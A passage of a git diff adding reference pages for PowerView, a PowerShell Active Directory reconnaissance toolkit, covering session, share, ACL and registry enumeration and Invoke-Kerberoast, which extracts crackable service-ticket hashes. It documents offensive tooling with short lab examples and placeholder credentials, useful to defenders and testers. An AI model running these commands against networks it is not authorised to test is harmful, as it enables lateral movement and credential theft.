+S-1-5-21-89... +False False +primary.tes... +Administrators TESTLAB\Ent... +S-1-5-21-89... +True False +primary.tes... +Administrators TESTLAB\Dom... +S-1-5-21-89... +True False + +## PARAMETERS + +### -ComputerName +Specifies the hostname to query for sessions (also accepts IP addresses). +Defaults to the localhost. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: HostName, dnshostname, name + +Required: False +Position: 1 +Default value: $Env:COMPUTERNAME +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -GroupName +The local group name to query for users. +If not given, it defaults to "Administrators". + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Administrators +Accept pipeline input: True (ByPropertyName) +Accept wildcard characters: False +``` + +### -Method +The collection method to use, defaults to 'API', also accepts 'WinNT'. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: CollectionMethod + +Required: False +Position: Named +Default value: API +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to a remote machine. +Only applicable with "-Method WinNT". + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.LocalGroupMember.API + +Custom PSObject with translated group property fields from API results. + +PowerView.LocalGroupMember.WinNT + +Custom PSObject with translated group property fields from WinNT results. + +## NOTES + +## RELATED LINKS + +[http://stackoverflow.com/questions/21288220/get-all-local-members-and-groups-displayed-together +http://msdn.microsoft.com/en-us/library/aa772211(VS.85).aspx +https://msdn.microsoft.com/en-us/library/windows/desktop/aa370601(v=vs.85).aspx](http://stackoverflow.com/questions/21288220/get-all-local-members-and-groups-displayed-together +http://msdn.microsoft.com/en-us/library/aa772211(VS.85).aspx +https://msdn.microsoft.com/en-us/library/windows/desktop/aa370601(v=vs.85).aspx) + diff --git a/docs/Recon/Get-NetLoggedon.md b/docs/Recon/Get-NetLoggedon.md new file mode 100755 index 0000000..024d1b2 --- /dev/null +++ b/docs/Recon/Get-NetLoggedon.md @@ -0,0 +1,100 @@ +# Get-NetLoggedon + +## SYNOPSIS +Returns users logged on the local (or a remote) machine. +Note: administrative rights needed for newer Windows OSes. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf + +## SYNTAX + +``` +Get-NetLoggedon [[-ComputerName] ] [-Credential ] +``` + +## DESCRIPTION +This function will execute the NetWkstaUserEnum Win32API call to query +a given host for actively logged on users. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-NetLoggedon +``` + +Returns users actively logged onto the local host. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-NetLoggedon -ComputerName sqlserver +``` + +Returns users actively logged onto the 'sqlserver' host. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-DomainComputer | Get-NetLoggedon +``` + +Returns all logged on users for all computers in the domain. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-NetLoggedon -ComputerName sqlserver -Credential $Cred + +## PARAMETERS + +### -ComputerName +Specifies the hostname to query for logged on users (also accepts IP addresses). +Defaults to 'localhost'. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: HostName, dnshostname, name + +Required: False +Position: 1 +Default value: Localhost +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the remote system using Invoke-UserImpersonation. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.LoggedOnUserInfo + +A PSCustomObject representing a WKSTA_USER_INFO_1 structure, including +the UserName/LogonDomain/AuthDomains/LogonServer for each user, with the ComputerName added. + +## NOTES + +## RELATED LINKS + +[http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/](http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/) + diff --git a/docs/Recon/Get-NetRDPSession.md b/docs/Recon/Get-NetRDPSession.md new file mode 100755 index 0000000..ff18322 --- /dev/null +++ b/docs/Recon/Get-NetRDPSession.md @@ -0,0 +1,104 @@ +# Get-NetRDPSession + +## SYNOPSIS +Returns remote desktop/session information for the local (or a remote) machine. + +Note: only members of the Administrators or Account Operators local group +can successfully execute this functionality on a remote target. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf + +## SYNTAX + +``` +Get-NetRDPSession [[-ComputerName] ] [-Credential ] +``` + +## DESCRIPTION +This function will execute the WTSEnumerateSessionsEx and WTSQuerySessionInformation +Win32API calls to query a given RDP remote service for active sessions and originating +IPs. +This is a replacement for qwinsta. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-NetRDPSession +``` + +Returns active RDP/terminal sessions on the local host. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-NetRDPSession -ComputerName "sqlserver" +``` + +Returns active RDP/terminal sessions on the 'sqlserver' host. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-DomainController | Get-NetRDPSession +``` + +Returns active RDP/terminal sessions on all domain controllers. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-NetRDPSession -ComputerName sqlserver -Credential $Cred + +## PARAMETERS + +### -ComputerName +Specifies the hostname to query for active sessions (also accepts IP addresses). +Defaults to 'localhost'. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: HostName, dnshostname, name + +Required: False +Position: 1 +Default value: Localhost +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the remote system using Invoke-UserImpersonation. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.RDPSessionInfo + +A PSCustomObject representing a combined WTS_SESSION_INFO_1 and WTS_CLIENT_ADDRESS structure, +with the ComputerName added. + +## NOTES + +## RELATED LINKS + +[https://msdn.microsoft.com/en-us/library/aa383861(v=vs.85).aspx](https://msdn.microsoft.com/en-us/library/aa383861(v=vs.85).aspx) + diff --git a/docs/Recon/Get-NetSession.md b/docs/Recon/Get-NetSession.md new file mode 100755 index 0000000..d9e2f50 --- /dev/null +++ b/docs/Recon/Get-NetSession.md @@ -0,0 +1,99 @@ +# Get-NetSession + +## SYNOPSIS +Returns session information for the local (or a remote) machine. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf + +## SYNTAX + +``` +Get-NetSession [[-ComputerName] ] [-Credential ] +``` + +## DESCRIPTION +This function will execute the NetSessionEnum Win32API call to query +a given host for active sessions. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-NetSession +``` + +Returns active sessions on the local host. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-NetSession -ComputerName sqlserver +``` + +Returns active sessions on the 'sqlserver' host. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-DomainController | Get-NetSession +``` + +Returns active sessions on all domain controllers. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-NetSession -ComputerName sqlserver -Credential $Cred + +## PARAMETERS + +### -ComputerName +Specifies the hostname to query for sessions (also accepts IP addresses). +Defaults to 'localhost'. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: HostName, dnshostname, name + +Required: False +Position: 1 +Default value: Localhost +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the remote system using Invoke-UserImpersonation. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.SessionInfo + +A PSCustomObject representing a WKSTA_USER_INFO_1 structure, including +the CName/UserName/Time/IdleTime for each session, with the ComputerName added. + +## NOTES + +## RELATED LINKS + +[http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/](http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/) + diff --git a/docs/Recon/Get-NetShare.md b/docs/Recon/Get-NetShare.md new file mode 100755 index 0000000..b3f2abe --- /dev/null +++ b/docs/Recon/Get-NetShare.md @@ -0,0 +1,100 @@ +# Get-NetShare + +## SYNOPSIS +Returns open shares on the local (or a remote) machine. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf + +## SYNTAX + +``` +Get-NetShare [[-ComputerName] ] [-Credential ] +``` + +## DESCRIPTION +This function will execute the NetShareEnum Win32API call to query +a given host for open shares. +This is a replacement for "net share \\\\hostname". + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-NetShare +``` + +Returns active shares on the local host. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-NetShare -ComputerName sqlserver +``` + +Returns active shares on the 'sqlserver' host + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-DomainComputer | Get-NetShare +``` + +Returns all shares for all computers in the domain. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-NetShare -ComputerName sqlserver -Credential $Cred + +## PARAMETERS + +### -ComputerName +Specifies the hostname to query for shares (also accepts IP addresses). +Defaults to 'localhost'. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: HostName, dnshostname, name + +Required: False +Position: 1 +Default value: Localhost +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the remote system using Invoke-UserImpersonation. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.ShareInfo + +A PSCustomObject representing a SHARE_INFO_1 structure, including +the name/type/remark for each share, with the ComputerName added. + +## NOTES + +## RELATED LINKS + +[http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/](http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/) + diff --git a/docs/Recon/Get-PathAcl.md b/docs/Recon/Get-PathAcl.md new file mode 100755 index 0000000..448212f --- /dev/null +++ b/docs/Recon/Get-PathAcl.md @@ -0,0 +1,94 @@ +# Get-PathAcl + +## SYNOPSIS +Enumerates the ACL for a given file path. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Add-RemoteConnection, Remove-RemoteConnection, ConvertFrom-SID + +## SYNTAX + +``` +Get-PathAcl [-Path] [[-Credential] ] +``` + +## DESCRIPTION +Enumerates the ACL for a specified file/folder path, and translates +the access rules for each entry into readable formats. +If -Credential is passed, +Add-RemoteConnection/Remove-RemoteConnection is used to temporarily map the remote share. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-PathAcl "\\SERVER\Share\" +``` + +Returns ACLs for the given UNC share. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +gci .\test.txt | Get-PathAcl +``` + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm', $SecPassword) +Get-PathAcl -Path "\\\\SERVER\Share\" -Credential $Cred + +## PARAMETERS + +### -Path +Specifies the local or remote path to enumerate the ACLs for. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: FullName + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target path. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: 2 +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +### String + +One of more paths to enumerate ACLs for. + +## OUTPUTS + +### PowerView.FileACL + +A custom object with the full path and associated ACL entries. + +## NOTES + +## RELATED LINKS + +[https://support.microsoft.com/en-us/kb/305144](https://support.microsoft.com/en-us/kb/305144) + diff --git a/docs/Recon/Get-RegLoggedOn.md b/docs/Recon/Get-RegLoggedOn.md new file mode 100755 index 0000000..2fd6e09 --- /dev/null +++ b/docs/Recon/Get-RegLoggedOn.md @@ -0,0 +1,89 @@ +# Get-RegLoggedOn + +## SYNOPSIS +Returns who is logged onto the local (or a remote) machine +through enumeration of remote registry keys. + +Note: This function requires only domain user rights on the +machine you're enumerating, but remote registry must be enabled. + +Author: Matt Kelly (@BreakersAll) +License: BSD 3-Clause +Required Dependencies: Invoke-UserImpersonation, Invoke-RevertToSelf, ConvertFrom-SID + +## SYNTAX + +``` +Get-RegLoggedOn [[-ComputerName] ] +``` + +## DESCRIPTION +This function will query the HKU registry values to retrieve the local +logged on users SID and then attempt and reverse it. +Adapted technique from Sysinternal's PSLoggedOn script. +Benefit over +using the NetWkstaUserEnum API (Get-NetLoggedon) of less user privileges +required (NetWkstaUserEnum requires remote admin access). + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-RegLoggedOn +``` + +Returns users actively logged onto the local host. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-RegLoggedOn -ComputerName sqlserver +``` + +Returns users actively logged onto the 'sqlserver' host. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-DomainController | Get-RegLoggedOn +``` + +Returns users actively logged on all domain controllers. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-RegLoggedOn -ComputerName sqlserver -Credential $Cred + +## PARAMETERS + +### -ComputerName +Specifies the hostname to query for remote registry values (also accepts IP addresses). +Defaults to 'localhost'. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: HostName, dnshostname, name + +Required: False +Position: 1 +Default value: Localhost +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.RegLoggedOnUser + +A PSCustomObject including the UserDomain/UserName/UserSID of each +actively logged on user, with the ComputerName added. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-WMIProcess.md b/docs/Recon/Get-WMIProcess.md new file mode 100755 index 0000000..481dbb6 --- /dev/null +++ b/docs/Recon/Get-WMIProcess.md @@ -0,0 +1,80 @@ +# Get-WMIProcess + +## SYNOPSIS +Returns a list of processes and their owners on the local or remote machine. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Get-WMIProcess [[-ComputerName] ] [-Credential ] +``` + +## DESCRIPTION +Uses Get-WMIObject to enumerate all Win32_process instances on the local or remote machine, +including the owners of the particular process. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-WMIProcess -ComputerName WINDOWS1 +``` + +### -------------------------- EXAMPLE 2 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-WMIProcess -ComputerName PRIMARY.testlab.local -Credential $Cred + +## PARAMETERS + +### -ComputerName +Specifies the hostname to query for cached RDP connections (also accepts IP addresses). +Defaults to 'localhost'. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: HostName, dnshostname, name + +Required: False +Position: 1 +Default value: Localhost +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the remote system. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.UserProcess + +A PSCustomObject containing the remote process information. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-WMIRegCachedRDPConnection.md b/docs/Recon/Get-WMIRegCachedRDPConnection.md new file mode 100755 index 0000000..fe60228 --- /dev/null +++ b/docs/Recon/Get-WMIRegCachedRDPConnection.md @@ -0,0 +1,99 @@ +# Get-WMIRegCachedRDPConnection + +## SYNOPSIS +Returns information about RDP connections outgoing from the local (or remote) machine. + +Note: This function requires administrative rights on the machine you're enumerating. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: ConvertFrom-SID + +## SYNTAX + +``` +Get-WMIRegCachedRDPConnection [[-ComputerName] ] [-Credential ] +``` + +## DESCRIPTION +Uses remote registry functionality to query all entries for the +"Windows Remote Desktop Connection Client" on a machine, separated by +user and target server. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-WMIRegCachedRDPConnection +``` + +Returns the RDP connection client information for the local machine. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-WMIRegCachedRDPConnection -ComputerName WINDOWS2.testlab.local +``` + +Returns the RDP connection client information for the WINDOWS2.testlab.local machine + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-DomainComputer | Get-WMIRegCachedRDPConnection +``` + +Returns cached RDP information for all machines in the domain. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-WMIRegCachedRDPConnection -ComputerName PRIMARY.testlab.local -Credential $Cred + +## PARAMETERS + +### -ComputerName +Specifies the hostname to query for cached RDP connections (also accepts IP addresses). +Defaults to 'localhost'. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: HostName, dnshostname, name + +Required: False +Position: 1 +Default value: Localhost +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connecting to the remote system. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.CachedRDPConnection + +A PSCustomObject containing the ComputerName and cached RDP information. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-WMIRegLastLoggedOn.md b/docs/Recon/Get-WMIRegLastLoggedOn.md new file mode 100755 index 0000000..bed39e0 --- /dev/null +++ b/docs/Recon/Get-WMIRegLastLoggedOn.md @@ -0,0 +1,98 @@ +# Get-WMIRegLastLoggedOn + +## SYNOPSIS +Returns the last user who logged onto the local (or a remote) machine. + +Note: This function requires administrative rights on the machine you're enumerating. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Get-WMIRegLastLoggedOn [[-ComputerName] ] [-Credential ] +``` + +## DESCRIPTION +This function uses remote registry to enumerate the LastLoggedOnUser registry key +for the local (or remote) machine. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-WMIRegLastLoggedOn +``` + +Returns the last user logged onto the local machine. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-WMIRegLastLoggedOn -ComputerName WINDOWS1 +``` + +Returns the last user logged onto WINDOWS1 + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-DomainComputer | Get-WMIRegLastLoggedOn +``` + +Returns the last user logged onto all machines in the domain. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-WMIRegLastLoggedOn -ComputerName PRIMARY.testlab.local -Credential $Cred + +## PARAMETERS + +### -ComputerName +Specifies the hostname to query for remote registry values (also accepts IP addresses). +Defaults to 'localhost'. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: HostName, dnshostname, name + +Required: False +Position: 1 +Default value: Localhost +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connecting to the remote system. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.LastLoggedOnUser + +A PSCustomObject containing the ComputerName and last loggedon user. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-WMIRegMountedDrive.md b/docs/Recon/Get-WMIRegMountedDrive.md new file mode 100755 index 0000000..353bcf0 --- /dev/null +++ b/docs/Recon/Get-WMIRegMountedDrive.md @@ -0,0 +1,97 @@ +# Get-WMIRegMountedDrive + +## SYNOPSIS +Returns information about saved network mounted drives for the local (or remote) machine. + +Note: This function requires administrative rights on the machine you're enumerating. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: ConvertFrom-SID + +## SYNTAX + +``` +Get-WMIRegMountedDrive [[-ComputerName] ] [-Credential ] +``` + +## DESCRIPTION +Uses remote registry functionality to enumerate recently mounted network drives. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-WMIRegMountedDrive +``` + +Returns the saved network mounted drives for the local machine. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-WMIRegMountedDrive -ComputerName WINDOWS2.testlab.local +``` + +Returns the saved network mounted drives for the WINDOWS2.testlab.local machine + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-DomainComputer | Get-WMIRegMountedDrive +``` + +Returns the saved network mounted drives for all machines in the domain. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-WMIRegMountedDrive -ComputerName PRIMARY.testlab.local -Credential $Cred + +## PARAMETERS + +### -ComputerName +Specifies the hostname to query for mounted drive information (also accepts IP addresses). +Defaults to 'localhost'. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: HostName, dnshostname, name + +Required: False +Position: 1 +Default value: Localhost +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connecting to the remote system. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.RegMountedDrive + +A PSCustomObject containing the ComputerName and mounted drive information. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-WMIRegProxy.md b/docs/Recon/Get-WMIRegProxy.md new file mode 100755 index 0000000..b5fe966 --- /dev/null +++ b/docs/Recon/Get-WMIRegProxy.md @@ -0,0 +1,93 @@ +# Get-WMIRegProxy + +## SYNOPSIS +Enumerates the proxy server and WPAD conents for the current user. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Get-WMIRegProxy [[-ComputerName] ] [-Credential ] +``` + +## DESCRIPTION +Enumerates the proxy server and WPAD specification for the current user +on the local machine (default), or a machine specified with -ComputerName. +It does this by enumerating settings from +HKU:SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-WMIRegProxy +``` + +ComputerName ProxyServer AutoConfigURL Wpad +------------ ----------- ------------- ---- +WINDOWS1 http://primary.test... + +### -------------------------- EXAMPLE 2 -------------------------- +``` +$Cred = Get-Credential "TESTLAB\administrator" +``` + +Get-WMIRegProxy -Credential $Cred -ComputerName primary.testlab.local + +ComputerName ProxyServer AutoConfigURL Wpad +------------ ----------- ------------- ---- +windows1.testlab.local primary.testlab.local + +## PARAMETERS + +### -ComputerName +Specifies the system to enumerate proxy settings on. +Defaults to the local host. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: HostName, dnshostname, name + +Required: False +Position: 1 +Default value: $Env:COMPUTERNAME +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connecting to the remote system. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +### String + +Accepts one or more computer name specification strings on the pipeline (netbios or FQDN). + +## OUTPUTS + +### PowerView.ProxySettings + +Outputs custom PSObjects with the ComputerName, ProxyServer, AutoConfigURL, and WPAD contents. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Invoke-Kerberoast.md b/docs/Recon/Invoke-Kerberoast.md new file mode 100755 index 0000000..edfb89b --- /dev/null +++ b/docs/Recon/Invoke-Kerberoast.md @@ -0,0 +1,233 @@ +# Invoke-Kerberoast + +## SYNOPSIS +Requests service tickets for kerberoast-able accounts and returns extracted ticket hashes. + +Author: Will Schroeder (@harmj0y), @machosec +License: BSD 3-Clause +Required Dependencies: Invoke-UserImpersonation, Invoke-RevertToSelf, Get-DomainUser, Get-DomainSPNTicket + +## SYNTAX + +``` +Invoke-Kerberoast [[-Identity] ] [-Domain ] [-LDAPFilter ] [-SearchBase ] + [-Server ] [-SearchScope ] [-ResultPageSize ] [-ServerTimeLimit ] [-Tombstone] + [-OutputFormat ] [-Credential ] +``` + +## DESCRIPTION +Uses Get-DomainUser to query for user accounts with non-null service principle +names (SPNs) and uses Get-SPNTicket to request/extract the crackable ticket information. +The ticket format can be specified with -OutputFormat \. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Invoke-Kerberoast | fl +``` + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Invoke-Kerberoast -Domain dev.testlab.local | fl +``` + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -orce +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLB\dfm.a', $SecPassword) +Invoke-Kerberoast -Credential $Cred -Verbose | fl + +## PARAMETERS + +### -Identity +A SamAccountName (e.g. +harmj0y), DistinguishedName (e.g. +CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. +S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. +4c435dd7-dc58-4b14-9a5e-1fdb0e80d201). +Wildcards accepted. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: DistinguishedName, SamAccountName, Name, MemberDistinguishedName, MemberName + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to use for the query, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LDAPFilter +Specifies an LDAP query string that is used to filter Active Directory objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Filter + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +The LDAP source to search through, e.g. +"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + 